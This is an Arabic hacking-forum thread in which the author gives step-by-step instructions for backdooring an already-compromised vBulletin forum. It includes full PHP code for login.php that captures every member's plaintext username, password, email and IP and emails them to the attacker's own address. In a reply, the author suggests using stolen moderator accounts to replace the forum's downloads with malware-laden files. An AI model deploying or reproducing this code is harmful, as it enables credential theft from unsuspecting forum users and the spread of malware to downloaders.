1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] تلغيم سكربت VBulletin بدالة mail

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Mokhalad HaXor, بتاريخ ‏24 ديسمبر 2014.

كاتب الموضوع : Mokhalad HaXor المشاهدات : 1,010 الردود : 21 ‏24 ديسمبر 2014
  1. غير متصل

    Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:

    [​IMG]






    كيف حال اعضاء و زوار المنتدى الحبيب


    [​IMG]


    اليوم معنا طريقة قوية جدآ في تلغيم المنتديات بعد اختراقها الطريقة سهلة ميحاتج اعمل فيديو او اي صور توضيحية اتبع الخطوات فقط الطريقة تقوم ب سحب العضويات , طيب راح البعض يقول في سكربتات تجيب المعلومات ب دقيقة مافي داعي ل التلغيم


    الجواب هو , صحيح لاكن المعلومات لما تجيبهة راح تلاقي باسووردات الاعضاء مشفرة ب ال MD5 , راح تعبك ب فك الهاش في هذي الطريقة توصل يوزر و باسوورد صافي على الايمل


    [​IMG]


    تمام تبدي على بركة الله


    [​IMG]


    مثل ماتعرفون كلكم انو هذا السكربت تابع ل المنتديات
    اولآ ندخل على ملف الكونفك تبع المنتدى من الشل يكون هذا مساره



    [​IMG]


    vb/includes/config.php


    [​IMG]


    نقوم ب البحث على هذي الدالة

    [PHP CODE]$show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING')
    [/PHP CODE]

    [​IMG]

    التغيير الذي يكون عليهة هوة اضافة //
    يعني نسوي كومنت Comment

    i:q^:


    بحيث يكون على هذي الهيئة بعد التعديل
    [​IMG]


    [PHP CODE]// $show['nopasswordempty'] = defined('DISABLE_PASSWORD_CLEARING') [/PHP CODE]


    [​IMG]
    الان نذهب الى ملف ال login.php


    يكون مكانه هنا

    vb/login.php

    ونبحث عن هذي الدالة

    process_new_login

    تمام الان نضع هذا الكود اسفل هذي الدالة مباشرآ {1!9}

    [​IMG]

    [PHP CODE]

    $lg_username = strtolower($vbulletin->GPC["vb_login_username"]);
    $lg_password = $vbulletin->GPC["vb_login_password"];
    $sql_query = @mysql_query("SELECT * FROM " . TABLE_PREFIX . "user WHERE username='" . $lg_username . "'");
    while($row = @mysql_fetch_array($sql_query))
    {
    if(strlen($lg_password) > 1 AND strlen($lg_username) > 1)
    {
    function curPageURL() {
    $pageURL = 'http';
    if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
    $pageURL .= "://";
    if ($_SERVER["SERVER_PORT"] != "80") {
    $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
    } else {
    $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
    }
    return $pageURL;
    }
    $url = curPageURL();
    $ip = getenv("REMOTE_ADDR");
    $hostname = gethostbyaddr($ip);
    $message = "------------------+ VBulletin Account +-----------------\n";
    $message .= "Forum URL : ".$url."\n";
    $message .= "UserName : ".$lg_username."\n";
    $message .= "Password : ".$lg_password."\n";
    $message .= "Email : ". $row["email"] ."\n";
    $message .= "----------------------- By Mokhalad HaXor --------------------------\n";
    $message .= "Client IP : ".$ip."\n";
    $message .= "HostName : ".$hostname."\n";
    $rnessage = "$message\n";
    $message .= "-------------------+ Created By Mokhalad HaXor +--------------------\n";
    $send= "هنا تضع الايميل الخاص بك اي كان ياهو او جيميل او هوتميل";
    $subject = "$url | VBulletin Account | $ip";
    $headers = "From:VBulletin Account<VB@Rezult.CoM>";
    mail($send,$subject,$message,$headers);
    }
    }
    [/PHP CODE]


    [​IMG]


    تمام التمام الان ننتضر فترة مناسبة و ننتضر ال ريزولت على الايميل
    و يحتوي على رابط المنتدى و معلومات الاعضاء
    هذي طريقة قوية في جلب معلومات الاعضاء
    انشاء الله تنال اعجابكم
    :{4!}:

    [​IMG]

    للاسف وصلنا ل نهاية الموضوع اراكم في شروحات اخرى

    الموضوع اهداء لـ

    м̨я.ǚs̲ǝя - الأوكراني - TeePlow - المعاقب الصدري - k!lwa s&rian ro0t - Ameer Eagle - مِحً ـمِدُ ألَعَ ـرآقَي - MR.CAPTCHA - ĐЯ-ЩΘЩΘ - AnonYmous-IQ - Pro.Mast3r

    [​IMG]
    و الى كل اعضاء و زوار المنتدى
    ً#ٌ5oًًًُ. ً#ٌ5oًًًُ. ً#ٌ5oًًًُ.
    [​IMG]
    [​IMG]
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    الأوكراني <div class="smal22">.:: غير موثوق ::.</div>
    موقوف لمخالفة الشروط

    عضو منذ:
    ‏22 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: تلغيم سكربت VBulletin بدالة mail

    بارك الله فيك موضوع قوي بصراحه موفق على الطرح
     


  3. غير متصل

    Ameer Eagle V.I.P
    V • I • P

    عضو منذ:
    ‏7 يونيو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,777
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Student
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    وعليكم السلام ورحمة الله وبركاته ........ مبدع صديقي مخلد ابن هكسورة ...... شرح ولا اروع تحياتي وتقديري {1!@}
    عدل السحكات {1!$2}
     


  4. غير متصل

    ADNAN
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    شرح متعوب عليه

    يعطيك العافيه

    جاري القيام بالواجب لانك تستحق أكثر مما لدينا
     


  5. غير متصل

    عہلي الصہقہور هنہا أنا الله وأنا ليه راجعون
    V • I • P

    عضو منذ:
    ‏29 نوفمبر 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    7
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    عاشت ايدك حبي مخلد


    يوشم بل خماسية


    [​IMG][​IMG][​IMG]
     


  6. غير متصل

    Windows Hacker
    V • I • P

    عضو منذ:
    ‏26 يوليو 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    26
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    شرح جميل جدآَ ، عآشت آيدك [​IMG]

    لكن مآذآ تستفيد من حسآبآت آلآعضآء [​IMG]
     


  7. غير متصل

    Mokhalad HaXor
    V • I • P

    عضو منذ:
    ‏3 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2,460
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    Hacking
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    الشكر لله حبيبي وندوز , اذا كان المنتدى معروف وفي اقسام طرح برامج الخ .. يمكنك ان تدخل على حسابات المشرفين وتبديل البرامج ب برامج ملغومة هذا ابسط استغلال لها
    :{13}: :{13}:
    :{13}:
     


  8. غير متصل

    AnonYmous-IQ مشرف آمن المواقع والسيرفرات
    ExpErt DeveloPer

    عضو منذ:
    ‏31 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    458
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    [+] Programmer [+]
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    [​IMG] عــأشت أيدك يا وردة {1!$7} دومك مبدع حياتي {1!$1} {1!$1} ​
     


  9. غير متصل

    k!lwa s&rian ro0t Expert
    طاقم الإدارة

    عضو منذ:
    ‏3 أغسطس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,236
    نقاط الجائزة:
    الجنس:
    ذكر

    رد: تلغيم سكربت VBulletin بدالة mail

    ولك شرح رائع جدآ
    منور ياغالي
     


  10. غير متصل

    м̨я.ǚs̲ǝя <div style="border-right: 5px solid; padding: 2px
    ExpErt DeveloPer

    عضو منذ:
    ‏16 ابريل 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    13
    نقاط الجائزة:
    الإقامة:

    رد: تلغيم سكربت VBulletin بدالة mail

    يعطيك العافيه [​IMG]
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...